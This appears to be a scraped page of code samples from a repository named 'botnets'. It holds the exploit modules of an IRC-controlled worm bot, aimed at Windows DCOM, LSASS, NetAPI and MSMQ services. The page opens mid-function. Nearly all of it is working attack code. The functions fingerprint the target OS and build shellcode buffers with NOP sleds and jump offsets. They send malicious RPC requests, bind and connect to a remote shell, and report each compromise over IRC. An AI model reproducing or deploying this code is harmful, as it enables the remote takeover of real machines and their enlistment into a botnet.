					memcpy(szReqBuf+iPos,	szSCBuf,			iSCSize						); iPos+=iSCSize;
					memcpy(szReqBuf+iPos,	request3,			sizeof(request3)-1			); iPos+=sizeof(request3)-1;
					memcpy(szReqBuf+iPos,	request4,			sizeof(request4)-1			); iPos+=sizeof(request4)-1;
					iReqSize=iPos;

					pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
					*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iSCSize / 2;
					*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize / 2; pTemp=szReqBuf;
					*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iSCSize - 12;

					unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000);
					// Send the bind string
					DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
					if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
					// Send the evil request
					if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
					if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false;
					free(szInBuf); }

				CloseHandle(hFile);
				CloseNullSession(m_sSocket.m_szHost); }
			return bRetVal;
#endif // _WIN32
		}
		break;
	default:
		return false;
		break;
	}

	return false;
}
示例#11
0
文件: lsass.cpp 项目: hazcod/botnets
BOOL lsass445(char *target, void* conn,EXINFO exinfo)
{
	IRC* irc=(IRC*)conn;
	int len;
	SOCKET sockfd;
	BOOL bsuccess = FALSE;
	char recvbuf[1600];

	int iHostOS=FpHost(exinfo.ip, FP_RPC);
	if(iHostOS==OS_UNKNOWN)
		iHostOS=FpHost(exinfo.ip, FP_SMB);
	if(iHostOS==OS_WINNT)
		return FALSE;
	
	SOCKADDR_IN their_addr;
	ZeroMemory(&their_addr,sizeof(their_addr));
	their_addr.sin_family = AF_INET;
	their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
	their_addr.sin_port = fhtons((unsigned short)exinfo.port);

	// connect to the server
	if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
		return FALSE;
	if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR) 
		return FALSE;

	if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
	{
		fclosesocket(sockfd);
		return FALSE;
	}
		
	if ((len=frecv(sockfd, recvbuf, 1600, 0))==SOCKET_ERROR)
	{
		fclosesocket(sockfd);
		return FALSE;
	}
		
	if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
	{
		fclosesocket(sockfd);
		return FALSE;
	}

	if ((len=frecv(sockfd, recvbuf, 1600, 0))==SOCKET_ERROR)
	{
		fclosesocket(sockfd);
		return FALSE;
	}

	if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)
	{
		fclosesocket(sockfd);
		return FALSE;
	}
		
	if ((len=frecv(sockfd, recvbuf, 1600, 0))==SOCKET_ERROR)
	{
		fclosesocket(sockfd);
		return FALSE;
	}

	switch (iHostOS)
	{
		case OS_WINXP:
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Trying to exploit IP: %s (XP)", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			if (Exploit(exinfo,sockfd,TARGET_XP))
				bsuccess = TRUE;
			break;

		case OS_WIN2K:
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Trying to exploit IP: %s (2K)", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			if (!Exploit(exinfo,sockfd,TARGET_2KA))
			{
				if (Exploit(exinfo,sockfd,TARGET_2K))
					bsuccess = TRUE;
			}
			else
				bsuccess = TRUE;
			
 			break;

		default:
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Trying to exploit IP: %s", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			if (!Exploit(exinfo,sockfd,TARGET_XP))
			{
				if (!Exploit(exinfo,sockfd,TARGET_2KA))
				{
					if (Exploit(exinfo,sockfd,TARGET_2K))
						bsuccess = TRUE;
				}
				else
					bsuccess = TRUE;
			} else
				bsuccess = TRUE;

			break;
	}

	fclosesocket(sockfd);
	if (bsuccess)
	{
		exploit[exinfo.exploit].stats++;
		if (!exinfo.silent)
			irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
	}
//	else
//		if (!exinfo.silent && exinfo.verbose)
//			irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);

	return TRUE;
}
示例#12
0
文件: netapi.cpp 项目: hazcod/botnets
void netapi(ExploitInfo_s* pExploitInfo)
{
	NETRESOURCE NtRes;
	HANDLE hFile;
	char szUnc[MAX_PATH];
	char szPipe[MAX_PATH];
	char szResponse[MAX_PATH];
	int nCount;
	DWORD dwValue;
	DWORD dwTarget = 0x00020804;
	char szShellcode[512];

	DWORD dwShellcodeSize = GenerateEncodedShellcode(szShellcode, sizeof(szShellcode), 
		dwShellcodeIpAddress, usShellcodePort, 
		pExploit[pExploitInfo->dwExploitId].dwExploitId, "\r\n\\_/.", sizeof("\r\n\\_/."));

	if (!dwShellcodeSize) 
		ExitThread(0);

	// Determine remote OS
	int iTargetOS = FpHost(pExploitInfo->dwRemoteIp, FP_RPC);
	
	if(!iTargetOS)
		iTargetOS = FpHost(pExploitInfo->dwRemoteIp, FP_PORT5K);
	if(!iTargetOS)
		iTargetOS = OS_WIN2K;

	ZeroMemory(szStub, sizeof(szStub));
	memset(szPath, '\x90', sizeof(szPath));

	sprintf(szUnc, "\\\\%s\\PIPE", GetIP(pExploitInfo->dwRemoteIp));
	sprintf(szPipe, "\\\\%s\\PIPE\\BROWSER", GetIP(pExploitInfo->dwRemoteIp));

	NtRes.dwType = RESOURCETYPE_ANY;
	NtRes.lpLocalName = NULL;
	NtRes.lpRemoteName = szUnc;
	NtRes.lpProvider = NULL;
	if (WNetAddConnection2(&NtRes, "", "", 0) != ERROR_SUCCESS) {
		ExitThread(0);
	}

	hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hFile == INVALID_HANDLE_VALUE) {
		ExitThread(0);
	}


	if (!TransactNamedPipe(hFile, &RPCBind, sizeof(RPCBind) - 1, szResponse, sizeof(szResponse), &dwValue, NULL)) {
		ExitThread(0);
	}

	if(iTargetOS == OS_WIN2K || iTargetOS == OS_WINNT){
	
		memcpy(szPath + 600, szShellcode, dwShellcodeSize);

		for (nCount = 0; nCount < 16; nCount++) {
			memcpy(szPath + 1000 + (nCount * 4),  &dwTarget, 4);
		}
	
		dwValue = 1152;
		memcpy(&RPCRequest[8], &dwValue, 2);
		dwValue = 1124;
		memcpy(&RPCRequest[16], &dwValue, 2);

		memcpy(szStub, &RPCRequest, 24);
		memcpy(szStub + 24, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 28, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 32, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 36, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 40, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 44, "\x15\x02\x00\x00", 4);
		memcpy(szStub + 48, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 52, "\x15\x02\x00\x00", 4);
		memcpy(szStub + 56, &szPath, 1064);
		memcpy(szStub + 1124, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 1128, "\x02\x00\x00\x00", 4);
		memcpy(szStub + 1132, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 1136, "\x02\x00\x00\x00", 4);
		memcpy(szStub + 1140, "\xeb\x02\x00\x00", 4);
		memcpy(szStub + 1144, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 1148, "\x00\x00\x00\x00", 4);

		TransactNamedPipe(hFile, szStub, 1152, szResponse, sizeof(szResponse), &dwValue, NULL);

	} else if(iTargetOS == OS_WINXP) {

		memcpy(szPath, szShellcode, dwShellcodeSize);
		dwValue = dwTarget + 6;
		memcpy(szPath + 612,  &dwValue, 4);
		memcpy(szPath + 624,  &dwTarget, 4);
		memcpy(szPath + 660,  &dwTarget, 4);
		memcpy(szPath + 672,  &dwTarget, 4);
		memcpy(szPath + 708,  "\x00\x00", 2);

		dwValue = 796;
		memcpy(&RPCRequest[8], &dwValue, 2);
		dwValue = 772;
		memcpy(&RPCRequest[16], &dwValue, 2);

		memcpy(szStub, &RPCRequest, 24);
		memcpy(szStub + 24, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 28, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 32, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 36, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 40, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 44, "\x63\x01\x00\x00", 4);
		memcpy(szStub + 48, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 52, "\x63\x01\x00\x00", 4);
		memcpy(szStub + 56, &szPath, 710);
		memcpy(szStub + 768, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 772, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 776, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 780, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 784, "\x00\x00\x00\x00", 4);
		memcpy(szStub + 788, "\x01\x00\x00\x00", 4);
		memcpy(szStub + 792, "\x00\x00\x00\x00", 4);

		TransactNamedPipe(hFile, szStub, 796, szResponse, sizeof(szResponse), &dwValue, NULL);
		if (dwValue) {
			TransactNamedPipe(hFile, szStub, 796, szResponse, sizeof(szResponse), &dwValue, NULL);
		}
	} else
		return;

	ExitThread(1);
}
示例#13
0
BOOL dcom2(EXINFO exinfo)
{
	char sendbuf[IRCLINE],*pTemp;
	char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096];
	int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0;

	int TargetOS = FpHost(exinfo.ip, FP_RPC);
	if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE;

	// get a funky fresh socket
	SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
	if (sSocket == SOCKET_ERROR) return FALSE;

	// fill in sockaddr and resolve the host
	SOCKADDR_IN ssin; 
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)exinfo.port);
	ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

	iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename);
	if (!iShellSize) return 0;

	iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1);

	memcpy(szLoadBuf+iPos,							dcom2_shellcode_buf,	sizeof(dcom2_shellcode_buf)		); iPos+=sizeof(dcom2_shellcode_buf);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			szLoaderBuf,			iLoaderSize						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			szShellBuf,             iShellSize	);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR,	&dcom2_my_offsets[0].lJmpAddr,	4						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, 	&dcom2_my_offsets[0].lTopSEH,	4						);
	iLoadSize = iPos; iPos = 0;

	pTemp = szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
	*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iLoadSize / 2;
	*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize / 2; pTemp=szReqBuf;
    *(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iLoadSize - 12;

	// connect with target IP
	int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
	if (iErr==-1) { // connect failed, exit
		fclosesocket(sSocket);
		return FALSE;
	}

	// send the bind string
	if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}

	// read reply
	frecv(sSocket, szRecvBuf, 4096, 0);

	// Check for DCE_PKT_BINDACK
	if (szRecvBuf[2] != DCE_PKT_BINDACK) {
		fclosesocket(sSocket);
		return FALSE;
	}

	// send evil request
	if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}

	// read reply
	frecv(sSocket, szRecvBuf, 4096, 0);

	if (szRecvBuf[2] == DCE_PKT_FAULT) {
		fclosesocket(sSocket);
		return FALSE;
	}

	fclosesocket(sSocket);

	sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
	for (int i=0; i < 6; i++) {
		if (searchlog(sendbuf)) {
			sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
			if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
			addlog(sendbuf);
			exploit[exinfo.exploit].stats++;

			break;
		}
		Sleep(5000);
	}

	return TRUE;
}
示例#14
0
BOOL MSMQ(EXINFO exinfo)
{
	if(!fNetWkstaGetInfo) { return FALSE; }
    char* cname;
    char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
    char *packet = NULL;
    unsigned short bindport;
    unsigned long cnt;
    struct sockaddr_in addr;
    int len, cpkt = 1;
    int sockfd;
    char recvbuf[4096];
    char *buff, *ptr;
    if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0)
        return FALSE;

    addr.sin_family = AF_INET;
    addr.sin_port = fhtons(exinfo.port);
    addr.sin_addr.s_addr = finet_addr(exinfo.ip);
    memset(&(addr.sin_zero), '\0', 8);

    if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
        return FALSE;

    packet = dce_rpc_bind(0, endp, 1, &cnt);
    if (fsend(sockfd, packet, cnt, 0) == -1) { free(packet); return FALSE; }
    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 0) { free(packet); return FALSE; }

    cname = GetRemoteComputerName(exinfo.ip);
	if(strlen(cname) == 0) { return FALSE; }

    buff = (char *) malloc(4172);
    memset(buff, NOP, 4172);

    ptr = buff;
    memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
    ptr += sizeof(dce_rpc_header1)-1;

    msmq_convert_name(ptr, cname);
    ptr += strlen(cname)*2;

    memcpy(ptr, tag_private, sizeof(tag_private)-1);
    ptr += sizeof(tag_private)-1;

    memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

    ptr = buff;
    ptr += 438;
    memcpy(ptr, offsets, sizeof(offsets)-1);
    ptr += sizeof(offsets)-1;

	int bp = brandom(1337,65535);
    bindport = (unsigned short)bp;
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

    buff[4170] = '\0';
    buff[4171] = '\0';

	int TargetOS = FpHost(exinfo.ip, FP_RPC);
	if(TargetOS == OS_WIN2K) cpkt = 8;
	if(TargetOS == OS_WINXP) cpkt = 1;

    while (cpkt--) {
        if (fsend(sockfd, buff, 4172, 0) == -1) {
            return FALSE;
        }
    }
	fclosesocket(sockfd);
    Sleep(500);
	free(buff);
	if(ConnectShellEx(exinfo, bp) == true) { exploit[exinfo.exploit].stats++; return TRUE;}
    return FALSE;
}